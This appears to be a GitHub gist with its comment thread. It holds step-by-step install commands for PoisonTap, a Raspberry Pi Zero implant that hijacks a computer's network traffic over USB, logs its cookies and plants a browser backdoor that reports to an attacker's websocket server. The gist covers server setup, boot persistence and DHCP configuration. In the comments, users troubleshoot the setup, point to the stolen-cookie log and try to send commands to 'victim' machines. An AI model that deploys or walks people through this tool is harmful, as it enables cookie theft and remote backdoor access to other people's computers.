PoisonTap Install Commands

Pi.txt

##Server:
sudo apt-get update && apt-get upgrade
sudo apt-get install screen nodejs nodejs-legacy git npm
sudo npm install websocket
git clone https://github.com/samyk/poisontap
screen
sudo node backend_server.js 

##piZero:
sudo apt-get update && apt-get upgrade
sudo apt-get -y install isc-dhcp-server dsniff screen nodejs git
git clone https://github.com/samyk/poisontap

Update ws://YOUR.DOMAIN:1337 in backdoor.html to your public IP

ws://poisontap.jgamblin.com:1337

#add this to /etc/network/interfaces:
auto usb0
	allow-hotplug usb0
	iface usb0 inet static
	address 1.0.0.1
	netmask 0.0.0.0

#Setup to run at boot:
sudo cp /home/pi/poisontap/pi_startup.sh /etc/init.d/ && sudo chmod +x /etc/init.d/pi_startup.sh
add this to /etc/rc.local right above exit 0:
/etc/init.d/pi_startup.sh & 


#DHCP: 
sudo cp -f dhcpd.conf /etc/dhcp/dhcpd.conf
add this to  /etc/default/isc-dhcp-server:
INTERFACES="usb0"

So I did everything under the "piZero" and "Setup to run at Boot" categories. I'm assuming theres no reason to set up Server as I am not running a server however would I do what is under the DHCP tag on the piZero or would this be done somewhere else? From what I have done in the second and third category it does nothing when plugged into a Mac or Windows. I did this on Raspbian.

I assume the Pi zero gadget mode also need to be set up eg modules-load=dwc2,g_ether etc ? or does the writing to /sys/kernel/config/usb_gadget/ superceed that ?

for it to work correctly, you need the server component to catch the backdoor it installs in the browser cache. you don't need an actual "server" just any internet facing box with ports open. a VPS would do fine.

You need to set the pi zero to run DHCP on the usb0 ethernet port - so in order to do that you need to make the modifications mentioned under #DHCP section

$ echo "dtoverlay=dwc2" | sudo tee -a /boot/config.txt
$ echo "dwc2" | sudo tee -a /etc/modules
$ sudo echo "libcomposite" | sudo tee -a /etc/modules
//dont need the modules-load=dwc2,g_ether in /boot/cmdline.txt [thats the old g_ether way]

dhcp correction: copy the poisontap/dhcpd.conf to /etc/dhcp/dhcpd.conf

My issue is that the pi is not recognized by any computer when I plug it in anyway. I made the changed under #DHCP but computer's don't pick up any Ethernet port when I plug the pi in. I've tried both micro usb ports on the pi.

Try with the Pi zero connected to a hdmi screen. Do you see it setting up a usb0 device, or do you see errors? I'm still getting cant cd to /sys/kernel/config/usb_gadget and no usb0 device -- update: working now as CDC ECM device
Update2 - latest install notes sets it up a g_ether remote ndis device

I'm also having issues bringing up the usb0 device.
Getting the error "cant cd to /sys/kernel/config/usb_gadget" from the /etc/init.d/pi_startup.sh script

I followed all the instructions in pi.txt above.
How to set up as CDC ECM device (if that would help)?

I am getting the following when trying to start the backend_server.js via sudo node backend_sever.js on my server (that is actually another raspberry pi). What am I doing wrong?

/home/pi/backend_server.js:9
var server = http.createServer((request, response) => {
^
SyntaxError: Unexpected token >
at Module._compile (module.js:439:25)
at Object.Module._extensions..js (module.js:474:10)
at Module.load (module.js:356:32)
at Function.Module._load (module.js:312:12)
at Function.Module.runMain (module.js:497:10)
at startup (node.js:119:16)
at node.js:906:3

I have the same problem muhack!

Everything worked for me from ##PiZero onward.
My issue is, it connects as an ethernet device, greenlights, reads connected, but it just stops all web traffic dead.

The browser will read "resolving host" and then eventually just give me a "there is no internet connection" error.

I've followed the steps multiple times to the same results.

@Nz05012000 I solved it the following way:
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
sudo apt-get install nodejs

After the latest version of node (7.2) is installed, the backend_server.js starts!

@muhacl Thank you, that helped me!)

Question: for the ws://YOUR.DOMAIN:1337 do you have to have something like poisontap.whatever.com:1337 or can you just use an external ip like ##.##.###.###:1337 kind of deal? Is the subdomain pointing to anything in particular? Or as long as it is all consistent across the pi and the server that a bare ip would be ok? (the ##.## stuff)

hmm..

I setup my raspberry zero using the usb route (so no screen)

getting the following errors when running the startup

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

anyone knows if this is because I am setting up the device via usb ?

The thing that immediately jumps out to me is the "Device or resource busy" line. Unfortunately if the case is that it is because it is being used, then the only way to solve it would be to edit that file before it is inserted into the pi. the only way to stop the ONLY usb port is to not use it, but the pi does not have integrated wifi that you could ssh into. I am by no means an expert on this, but that is what jumps out to me. I have not run that part of the installation yet, so I do not know if I will run into it or not.

I am also wondering why this installation does not include anything about activating the g_eth. Like in this tutorial (found through the poisontap github) samyk/poisontap@068c283

wel it seems to run, but now i have no clue where to find the cookies on my test setup this tool is missing some manual/tutorials i'm guessing..

poisontap/poisontap.cookies.log

@Stephen2929 have you had success with the server side? (I finally got it working, the tutorial above is not very good, not to everyone: use the link I posted, and do part 2 before part 1) But when sending commands on the server, nothing is getting sent to the victim machine. I see that it was sent, and then on the screen that the backend is running on I see that it was requested. But when I send commands, like and alert command, nothing happens on the victim machine. Going through all of the logs I cannot see any evidence of anything being sent to the machine. Also, when looking at the network graph, samy's has lots of color. Mine is mostly gray however, and in the console I am getting 404 on almost all domain/poisontap links (I assume that is normal because those links don't actually exist. Any help would be greatly appreciated.

Edit: Update

I tried all steps describe in pi.txt but raspberry pi zero is not able to create a virtual Ethernet port on windows 7 and windows 10. anyone else had same problem and sorted out? i will appreciate for any response. thanks

Same issue...followed all the pi.txt steps and still i havent got a new Ethernet device. Both on Windows 7,8.1 and 10. Perhaps some step missing?

When I type "git clone https://github.com/samyk/poisontap"

I get this response

Cloning into 'poisontap'...
remote: Counting objects: 396, done.
remote: Compressing objects: 100% (15/15), done.
error: RPC failed; result=56, HTTP code = 200
fatal: The remote end hung up unexpectedly
fatal: early EOF
fatal: index-pack failed

is this something I've done or on github side? or what? Thank you in advance for your help.

I monitor the /var/log/syslog and I see the DHCPDISCOVER and also the DHCPOFFER on the raspberry zero. I also monitor the traffic using wireshark on the victim computer, and only see the DHCPDISCOVER, therefore I'm stucked with 169.254.X.X IP address. Any ideea?

UPDATE: I made it work by reinstalling the base OS and NOT upgrading it with apt-get upgrade and BRANCH=next rpi-update. It seems that if I updated it, something went wrong, I don't know if the ethernet emulation or DHCP, since both seems to work fine at first preview. I think the ethernet emulation was to blame, since the ping between computer and raspberry didn't work, either I configured the computer with statical IP address!

does anyone have a tutorial on getting the back end server running I'm not having any luck with it

I too am getting this error on start up:

ln: failed to create symbolic link ‘configs/c.1/acm.usb0’: File exists
sh: echo: I/O error
sh: echo: I/O error
ln: failed to create symbolic link ‘configs/c.1/ecm.usb0’: File exists
ls: write error: Device or resource busy
ifup: interface usb0 already configured
SIOCADDRT: File exists

anyone knows if this is because I am setting up the device via usb ?

can someone please help @ajdulion how did you get this working?

@eliddell1 @ajdulion i have exactly the same problem, can you help me please ?

I am not able to get the headless operations working. The RNDIS drivers are not supported anyone have any idea how I can solve this?

This is what it looks like now.
This is the error

This device cannot start. (Code 10)

{Operation Failed}
The requested operation was unsuccessful.